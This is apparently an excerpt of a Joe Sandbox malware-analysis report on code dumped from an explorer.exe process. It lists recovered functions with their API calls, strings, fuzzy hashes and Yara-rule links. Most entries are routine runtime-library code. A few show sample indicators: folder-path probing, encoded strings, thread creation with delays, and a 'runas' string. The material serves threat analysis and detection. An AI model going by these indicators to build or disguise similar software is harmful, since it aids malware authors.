Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2cbe3638b79cbf06ba32fd1449d1f3a26055f51cb8773e94ee907f766dd683cd
Instruction ID: 7d4162e706a78865c1801fc4b20784c8b31ec0801875d3f429de2a77e1149ce7
Opcode Fuzzy Hash: 2cbe3638b79cbf06ba32fd1449d1f3a26055f51cb8773e94ee907f766dd683cd
Instruction Fuzzy Hash: 3DC175B6E40214AFEB20DB98CC41FDEB7F9AB09744F544065FB05FB281DB719A458B90

Function 02F1AFB7 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 02F1B258, 02F1B25D

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: dc502dc0d32683308ae2aa99816b958ece68b0504a9844690a512416798518b6
Instruction ID: 567b13039781a8970d3da61e94e29045f4a1ec1e4ca08d63de4961676e08ad9e
Opcode Fuzzy Hash: dc502dc0d32683308ae2aa99816b958ece68b0504a9844690a512416798518b6
Instruction Fuzzy Hash: 0EC10375E04249DFDF1ADFA8C880BADBBB1BF49388F844159EA04AB391C7709945CF60

Function 02F23541 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F231FA: CreateFileW.KERNEL32(00000000,00000000,?,02F235EA,?,?,00000000,?,02F235EA,00000000,0000000C), ref: 02F23217

GetLastError.KERNEL32 ref: 02F23655
__dosmaperr.LIBCMT ref: 02F2365C
GetFileType.KERNEL32(00000000), ref: 02F23668
GetLastError.KERNEL32 ref: 02F23672
__dosmaperr.LIBCMT ref: 02F2367B
CloseHandle.KERNEL32(00000000), ref: 02F2369B
CloseHandle.KERNEL32(02F16E41), ref: 02F237E8
GetLastError.KERNEL32 ref: 02F2381A
__dosmaperr.LIBCMT ref: 02F23821

Strings

H, xrefs: 02F237A6

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: a65aad0f2c7c366165b4d5438ecaf14359360e18ad9f5985c642e69717c928c5
Instruction ID: 0373c9eeb67aa099d3fae36634738d345323af31db20caad08a11d228f353260
Opcode Fuzzy Hash: a65aad0f2c7c366165b4d5438ecaf14359360e18ad9f5985c642e69717c928c5
Instruction Fuzzy Hash: 24A13872E041689FCF199F68DC51BAD7BA2AB073A4F14018DE905AF391CB38895ACF51

Function 02F0CA12 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 02F0CB0F
type_info::operator==.LIBVCRUNTIME ref: 02F0CB31
___TypeMatch.LIBVCRUNTIME ref: 02F0CC40
IsInExceptionSpec.LIBVCRUNTIME ref: 02F0CD12
_UnwindNestedFrames.LIBCMT ref: 02F0CD96
CallUnexpected.LIBVCRUNTIME ref: 02F0CDB1

Strings

csm, xrefs: 02F0CB68
csm, xrefs: 02F0CABC
csm, xrefs: 02F0CA4F

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 8673bec0ae27de947d12427a1fb762c601584bedd8f5ba26006f1bb40946f263
Instruction ID: 2999c1a9d31d97cd17417e9a13a0adb8cda44f053ee17898522d98161a081a57
Opcode Fuzzy Hash: 8673bec0ae27de947d12427a1fb762c601584bedd8f5ba26006f1bb40946f263
Instruction Fuzzy Hash: 0DB15A71C00209EFCF29DFA4C9C09AEBBB6FF04394B14425AEA156B291D731DA51EF91

Function 02F16708 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F1671E

Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E

_free.LIBCMT ref: 02F1672A
_free.LIBCMT ref: 02F16735
_free.LIBCMT ref: 02F16740
_free.LIBCMT ref: 02F1674B
_free.LIBCMT ref: 02F16756
_free.LIBCMT ref: 02F16761
_free.LIBCMT ref: 02F1676C
_free.LIBCMT ref: 02F16777
_free.LIBCMT ref: 02F16785

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d2511d8b122bdf4329d9bd818e3741a3cfe788200dca66d8fc1add638fb19d1c
Instruction ID: c374363c4c48c600d51c2e20de4053433fd5cce00a10d371c625bebe3720548a
Opcode Fuzzy Hash: d2511d8b122bdf4329d9bd818e3741a3cfe788200dca66d8fc1add638fb19d1c
Instruction Fuzzy Hash: 0C217CBA900108AFDB42EF94CD40DDD7BB9FF08380F5141A5E619AB121EB31E654CF80

Function 02F209C6 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F20A34
_free.LIBCMT ref: 02F20A40
_free.LIBCMT ref: 02F20B69
_free.LIBCMT ref: 02F20B74

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 40cb9523b3089c3261c78eaa89e188599e7b9614ae3eac84c9877611507c7526
Instruction ID: 72b84b006ce79e8898924f49bf0fb3ea39d0ff55671186552673fe86efafb3f8
Opcode Fuzzy Hash: 40cb9523b3089c3261c78eaa89e188599e7b9614ae3eac84c9877611507c7526
Instruction Fuzzy Hash: 0B61E4779002159FDB30EF64C840BAAB7F9EB55394F60456DEA45EB280EB70A944CB90

Function 02F08A73 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02F08A9B
GetCurrentThreadId.KERNEL32 ref: 02F08AB8
GetCurrentThreadId.KERNEL32 ref: 02F08ACD
_xtime_get.LIBCPMT ref: 02F08B53
GetCurrentThreadId.KERNEL32 ref: 02F08B7D
__Xtime_diff_to_millis2.LIBCPMT ref: 02F08B99
_xtime_get.LIBCPMT ref: 02F08BBC
GetCurrentThreadId.KERNEL32 ref: 02F08BC6
GetCurrentThreadId.KERNEL32 ref: 02F08BFD

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: f719135e8562eb1cb5f7446292a3ebad1e44d9a7c00b78ae0c9b12c2934c5068
Instruction ID: e2980804746b8ee64d53761c072170204cd13c61bfda82a8d49ed07d90681424
Opcode Fuzzy Hash: f719135e8562eb1cb5f7446292a3ebad1e44d9a7c00b78ae0c9b12c2934c5068
Instruction Fuzzy Hash: 5A512DB1E00219DFCF10EF64C5C4AA9B7B5FF087D5B15845AEA06AB285DB30E940DF94

Function 02F02460 Relevance: 12.3, APIs: 8, Instructions: 343COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 02F02527
std::_Rethrow_future_exception.LIBCPMT ref: 02F02574
std::_Rethrow_future_exception.LIBCPMT ref: 02F02584
__Mtx_unlock.LIBCPMT ref: 02F0261B
__Mtx_unlock.LIBCPMT ref: 02F02714
__Mtx_unlock.LIBCPMT ref: 02F02762
__Cnd_broadcast.LIBCPMT ref: 02F027AC
__Mtx_unlock.LIBCPMT ref: 02F027B5

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
String ID:
API String ID: 3990724213-0
Opcode ID: e97fd323b5269c1d97c619242642a7bda5670139262094c1283c1208a42f8374
Instruction ID: 4e655ba8a7624b95630c4d3ee57eba559f6dfb56aa6b25be3e9fac97d3529375
Opcode Fuzzy Hash: e97fd323b5269c1d97c619242642a7bda5670139262094c1283c1208a42f8374
Instruction Fuzzy Hash: 15B11471D006499BDF20DFA4C988BAEBBF5AF05394F004569EE16972C1EB34A904DFA1

Function 02EFAB40 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 02EEA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,F48E75C7,00000000,?), ref: 02EEA4BA

GetFileAttributesA.KERNEL32(?,?,00000000,00000000,02F46494,0000000E,F48E75C7,00000000,00000000), ref: 02EFABED

Strings

2A==, xrefs: 02EF97F2, 02EFAE7B
., xrefs: 02EFB545
246122658369, xrefs: 02EF6D23, 02EF7080, 02EF70ED, 02EF74C3, 02EF8347, 02EFB44B, 02EFB4AD, 02EFB511, 02EFC4C9
4TI=, xrefs: 02EF70D0, 02EFB4F7
4Xlg, xrefs: 02EFAE41

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AttributesFileFolderPath
String ID: .$246122658369$2A==$4TI=$4Xlg
API String ID: 1512852658-2476712899
Opcode ID: 42535a390da486aaa2b791e0c8b84fa06be7dc6ec543fdf0e5f5ec24af0e8f9f
Instruction ID: 26c43cab27b7478e35b95203e02a8fee252d6ccd8dd353f4758be02e7cd6554f
Opcode Fuzzy Hash: 42535a390da486aaa2b791e0c8b84fa06be7dc6ec543fdf0e5f5ec24af0e8f9f
Instruction Fuzzy Hash: 75E19270D0128CDFEF14DBA4CA487DDBFB6AF55308F508188D5096B282C7B55A88DFA1

Function 02EF20F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

list too long, xrefs: 02EF2589

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID: list too long
API String ID: 0-1124181908
Opcode ID: 72ae74f1f4b02655dd6e78626717070833367f51985182b356fb59cb12a5cf8e
Instruction ID: b5cbcdabbedbbdc3450d2ef26dd70a82d5f9e39f9428a501a7f3f40a9e707a4a
Opcode Fuzzy Hash: 72ae74f1f4b02655dd6e78626717070833367f51985182b356fb59cb12a5cf8e
Instruction Fuzzy Hash: 1551B1B4D443199BEB10DF64CC45B99F7B5FB04750F1082AAEA0CA7280EB70AA91DF95

Function 02F0C4E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 02F0C517
___except_validate_context_record.LIBVCRUNTIME ref: 02F0C51F
_ValidateLocalCookies.LIBCMT ref: 02F0C5A8
__IsNonwritableInCurrentImage.LIBCMT ref: 02F0C5D3
_ValidateLocalCookies.LIBCMT ref: 02F0C628

Strings

csm, xrefs: 02F0C5BD

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ee43ddbd02a2ff8360d636d2c3d443d21914a4ca914df67a7453337a1cb1c653
Instruction ID: 9f33129107e7e5d7b9f213e96db0dd86bfe8cd145b2cb2c24549c3c89b4becda
Opcode Fuzzy Hash: ee43ddbd02a2ff8360d636d2c3d443d21914a4ca914df67a7453337a1cb1c653
Instruction Fuzzy Hash: 83418738E001089BCF10DF68C8C0AAEBBB6EF453A8F148256EA196B3D1D771D915DF90

Function 02F180D5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 02F18140
api-ms-, xrefs: 02F1812C

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 084678bc80e1398d95852395209f015cb5b9b6dfd8a68c9f2efba8d6d52ff294
Instruction ID: 94d9b6aee78f371db41f62d207f8eeed192b24ff9e2017510da70e30572f7330
Opcode Fuzzy Hash: 084678bc80e1398d95852395209f015cb5b9b6dfd8a68c9f2efba8d6d52ff294
Instruction Fuzzy Hash: 4621E773F41224ABFB224A259D85B6A7759AF02BE4F950514EF06B7290DB30DC00CAE0

Function 02F20E88 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F20BD4: _free.LIBCMT ref: 02F20BF9

_free.LIBCMT ref: 02F20ED6

Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E

_free.LIBCMT ref: 02F20EE1
_free.LIBCMT ref: 02F20EEC
_free.LIBCMT ref: 02F20F40
_free.LIBCMT ref: 02F20F4B
_free.LIBCMT ref: 02F20F56
_free.LIBCMT ref: 02F20F61

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 754e41f7b128c0b27d83c6c6f545dee9b963ccc8453acbe9e150d344b889af71
Instruction ID: 643634c941b474b7e9b20ef9eccf5fd8a68aa1ff9f7d1c74e92f3c372bb2a0fa
Opcode Fuzzy Hash: 754e41f7b128c0b27d83c6c6f545dee9b963ccc8453acbe9e150d344b889af71
Instruction Fuzzy Hash: 0711E272940714ABE539BBB0CC45FCBF79E9F15784F404819A3AEB6150EB76B5084F90

Function 02F171BF Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 02F17207
__fassign.LIBCMT ref: 02F173EC
__fassign.LIBCMT ref: 02F17409
WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F17451
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 02F17491
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F17539

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 9e867b8b3d55aee651fee146aa4a7a214dace030fe1107d70dee2cf17b18260b
Instruction ID: 9db86bbace3caf5391e7f5a7f96701cb322e8a7e68608c52404f188c04e68b1c
Opcode Fuzzy Hash: 9e867b8b3d55aee651fee146aa4a7a214dace030fe1107d70dee2cf17b18260b
Instruction Fuzzy Hash: B8C1AC71D042588FCB14DFA8C9809EDFBB5AF08354F68416AE95ABB341E7319E42CF60

Function 02F094C6 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 02F0950F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 02F0957A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F09597
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02F095D6
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F09635
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 02F09658

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 2c214c11fcee595460b408d01ddb857355ccf8dc65bb7f3d93ab7197bac4cc3b
Instruction ID: d3de5640d093ec24c713e68b975d152e9d108ef279eb04e4a92583dcfa90d2c3
Opcode Fuzzy Hash: 2c214c11fcee595460b408d01ddb857355ccf8dc65bb7f3d93ab7197bac4cc3b
Instruction Fuzzy Hash: 5151B572A0024AABDF208FA1DC84FAB7BAAEF44FD4F144519FA11961D1EBB1C910DF50

Function 02F04470 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02F044A5
std::_Lockit::_Lockit.LIBCPMT ref: 02F044C7
std::_Lockit::~_Lockit.LIBCPMT ref: 02F044E7
__Getctype.LIBCPMT ref: 02F0457D
std::_Facet_Register.LIBCPMT ref: 02F0459C
std::_Lockit::~_Lockit.LIBCPMT ref: 02F045B4

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: d385910dd3c5fb4fd1062927eb0cb63a1f164fdfd9924eb6d149a8d34b6b6b18
Instruction ID: b367b97d613bc5c5dbfabe433e1438dcc031c24aee6b8cef6fb8fa68f851f284
Opcode Fuzzy Hash: d385910dd3c5fb4fd1062927eb0cb63a1f164fdfd9924eb6d149a8d34b6b6b18
Instruction Fuzzy Hash: AC41AB75E002198FDB21DF54C980BAEB7F5EF54790F148569EA06AB380EB70AA45DB80

Function 02EE89E0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 322sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,F48E75C7,?,00000000,02F28B8D,000000FF), ref: 02EE8A1C
__Init_thread_footer.LIBCMT ref: 02EE8AB6

Part of subcall function 02F09788: EnterCriticalSection.KERNEL32(02F47FA8,76F90F00,?,02EE8ABB,02F4BDC0,02F2FB90), ref: 02F09792
Part of subcall function 02F09788: LeaveCriticalSection.KERNEL32(02F47FA8,?,02EE8ABB,02F4BDC0,02F2FB90), ref: 02F097C5
Part of subcall function 02F09788: WakeAllConditionVariable.KERNEL32(?,02F4BDC0,02F2FB90), ref: 02F0983C

CreateThread.KERNEL32(00000000,00000000,02EE8880,02F4B578,00000000,00000000), ref: 02EE8B1B
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02EE8B26

Part of subcall function 02F097D2: EnterCriticalSection.KERNEL32(02F47FA8,00000000,76F90F00,?,02EE8A41,02F4BDC0), ref: 02F097DD
Part of subcall function 02F097D2: LeaveCriticalSection.KERNEL32(02F47FA8,?,02EE8A41,02F4BDC0), ref: 02F0981A

Strings

runas, xrefs: 02EE8753

Memory Dump Source

